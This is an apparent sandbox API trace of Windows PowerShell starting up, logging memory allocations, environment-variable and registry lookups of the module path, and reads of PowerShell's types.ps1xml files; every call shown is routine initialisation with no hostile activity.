	[0417.214] CoTaskMemFree (pv=0x290840) 
	[0417.214] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0417.214] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.215] CoTaskMemFree (pv=0x290840) 
	[0417.216] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0417.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.216] CoTaskMemFree (pv=0x290840) 
	[0417.216] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0417.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.216] CoTaskMemFree (pv=0x290840) 
	[0417.217] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0417.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.217] CoTaskMemFree (pv=0x290840) 
	[0417.220] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0417.220] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.220] CoTaskMemFree (pv=0x290840) 
	[0417.462] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0417.462] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.462] CoTaskMemFree (pv=0x290840) 
	[0417.466] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0417.466] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.466] CoTaskMemFree (pv=0x290840) 
	[0417.467] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0417.467] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.467] CoTaskMemFree (pv=0x290840) 
	[0418.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.556] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0419.556] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0419.556] CoTaskMemFree (pv=0x290840) 
	[0419.557] CoTaskMemAlloc (cb=0xcc) returned 0x1b342a00
	[0419.557] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b342a00, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0419.557] CoTaskMemFree (pv=0x1b342a00) 
	[0419.557] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x18db08 | out: phkResult=0x18db08*=0x31c) returned 0x0
	[0419.558] RegQueryValueExW (in: hKey=0x31c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x18da8c, lpData=0x0, lpcbData=0x18da88*=0x0 | out: lpType=0x18da8c*=0x2, lpData=0x0, lpcbData=0x18da88*=0x6c) returned 0x0
	[0419.558] CoTaskMemAlloc (cb=0x70) returned 0x2359d0
	[0419.558] RegQueryValueExW (in: hKey=0x31c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x18da5c, lpData=0x2359d0, lpcbData=0x18da58*=0x6c | out: lpType=0x18da5c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x18da58*=0x6c) returned 0x0
	[0419.558] CoTaskMemFree (pv=0x2359d0) 
	[0419.558] CoTaskMemAlloc (cb=0xcc) returned 0x1b342a00
	[0419.558] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b342a00, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0419.558] CoTaskMemFree (pv=0x1b342a00) 
	[0419.558] CoTaskMemAlloc (cb=0xcc) returned 0x1b342a00
	[0419.558] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b342a00, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0419.558] CoTaskMemFree (pv=0x1b342a00) 
	[0419.562] RegCloseKey (hKey=0x31c) returned 0x0
	[0419.562] CoTaskMemAlloc (cb=0xcc) returned 0x1b342a00
	[0419.562] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b342a00, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0419.562] CoTaskMemFree (pv=0x1b342a00) 
	[0419.562] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x18db08 | out: phkResult=0x18db08*=0x31c) returned 0x0
	[0419.562] RegQueryValueExW (in: hKey=0x31c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x18da8c, lpData=0x0, lpcbData=0x18da88*=0x0 | out: lpType=0x18da8c*=0x0, lpData=0x0, lpcbData=0x18da88*=0x0) returned 0x2
	[0419.562] RegCloseKey (hKey=0x31c) returned 0x0
	[0419.566] CoTaskMemAlloc (cb=0x20c) returned 0x28e220
	[0419.566] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x28e220 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0419.567] CoTaskMemFree (pv=0x28e220) 
	[0419.567] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x18d690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0419.568] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0419.579] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0419.579] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0419.579] CoTaskMemFree (pv=0x290840) 
	[0420.549] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0420.549] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0420.549] CoTaskMemFree (pv=0x290840) 
	[0420.552] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0420.552] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0420.552] CoTaskMemFree (pv=0x290840) 
	[0420.552] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0420.552] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0420.552] CoTaskMemFree (pv=0x290840) 
	[0420.553] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d8f8 | out: phkResult=0x18d8f8*=0x324) returned 0x0
	[0420.554] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x18d90c, lpData=0x0, lpcbData=0x18d908*=0x0 | out: lpType=0x18d90c*=0x1, lpData=0x0, lpcbData=0x18d908*=0x74) returned 0x0
	[0420.555] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x18d87c, lpData=0x0, lpcbData=0x18d878*=0x0 | out: lpType=0x18d87c*=0x1, lpData=0x0, lpcbData=0x18d878*=0x74) returned 0x0
	[0420.555] CoTaskMemAlloc (cb=0x78) returned 0x2359d0
	[0420.555] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x18d84c, lpData=0x2359d0, lpcbData=0x18d848*=0x74 | out: lpType=0x18d84c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x18d848*=0x74) returned 0x0
	[0420.555] CoTaskMemFree (pv=0x2359d0) 
	[0420.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x18d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0420.555] SetErrorMode (uMode=0x1) returned 0x1
	[0420.556] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x18d7d0 | out: lpFileInformation=0x18d7d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0420.556] SetErrorMode (uMode=0x1) returned 0x1
	[0420.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x18d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0420.558] SetErrorMode (uMode=0x1) returned 0x1
	[0420.558] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d7d0 | out: lpFileInformation=0x18d7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0420.558] SetErrorMode (uMode=0x1) returned 0x1
	[0420.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x18d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0420.562] SetErrorMode (uMode=0x1) returned 0x1
	[0420.562] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d7d0 | out: lpFileInformation=0x18d7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0420.562] SetErrorMode (uMode=0x1) returned 0x1
	[0420.566] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0420.566] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0420.566] CoTaskMemFree (pv=0x290840) 
	[0420.573] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0420.573] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0420.573] CoTaskMemFree (pv=0x290840) 
	[0420.574] GetACP () returned 0x4e4
	[0420.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x18d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0420.583] SetErrorMode (uMode=0x1) returned 0x1
	[0420.583] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0420.584] GetFileType (hFile=0x328) returned 0x1
	[0420.584] SetErrorMode (uMode=0x1) returned 0x1
	[0420.584] GetFileType (hFile=0x328) returned 0x1
	[0420.588] ReadFile (in: hFile=0x328, lpBuffer=0x2e230d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2e230d0*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0420.591] ReadFile (in: hFile=0x328, lpBuffer=0x2e230d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2e230d0*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0420.591] ReadFile (in: hFile=0x328, lpBuffer=0x2e230d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2e230d0*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0420.591] ReadFile (in: hFile=0x328, lpBuffer=0x2e230d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2e230d0*, lpNumberOfBytesRead=0x18d708*=0xcf3, lpOverlapped=0x0) returned 1
	[0420.592] ReadFile (in: hFile=0x328, lpBuffer=0x2e2252b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2e2252b*, lpNumberOfBytesRead=0x18d708*=0x0, lpOverlapped=0x0) returned 1
	[0420.592] ReadFile (in: hFile=0x328, lpBuffer=0x2e230d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2e230d0*, lpNumberOfBytesRead=0x18d708*=0x0, lpOverlapped=0x0) returned 1
	[0420.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x18d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0421.484] SetErrorMode (uMode=0x1) returned 0x1
	[0421.484] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d680 | out: lpFileInformation=0x18d680*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0421.484] SetErrorMode (uMode=0x1) returned 0x1
	[0421.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x18d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0421.485] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d768 | out: phkResult=0x18d768*=0x328) returned 0x0
	[0421.485] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d6ec, lpData=0x0, lpcbData=0x18d6e8*=0x0 | out: lpType=0x18d6ec*=0x1, lpData=0x0, lpcbData=0x18d6e8*=0x56) returned 0x0
	[0421.485] CoTaskMemAlloc (cb=0x5a) returned 0x1b3496b0
	[0421.485] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d6bc, lpData=0x1b3496b0, lpcbData=0x18d6b8*=0x56 | out: lpType=0x18d6bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d6b8*=0x56) returned 0x0
	[0421.486] CoTaskMemFree (pv=0x1b3496b0) 
	[0421.486] RegCloseKey (hKey=0x328) returned 0x0
	[0421.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x18d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0421.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x18d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0422.293] GetSystemInfo (in: lpSystemInfo=0x18c3a0 | out: lpSystemInfo=0x18c3a0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0422.294] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0422.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x18d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0422.306] SetErrorMode (uMode=0x1) returned 0x1
	[0422.306] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1bc
	[0422.851] GetFileType (hFile=0x1bc) returned 0x1
	[0422.851] SetErrorMode (uMode=0x1) returned 0x1
	[0422.851] GetFileType (hFile=0x1bc) returned 0x1
	[0422.851] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.853] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.853] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.853] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.853] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.853] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
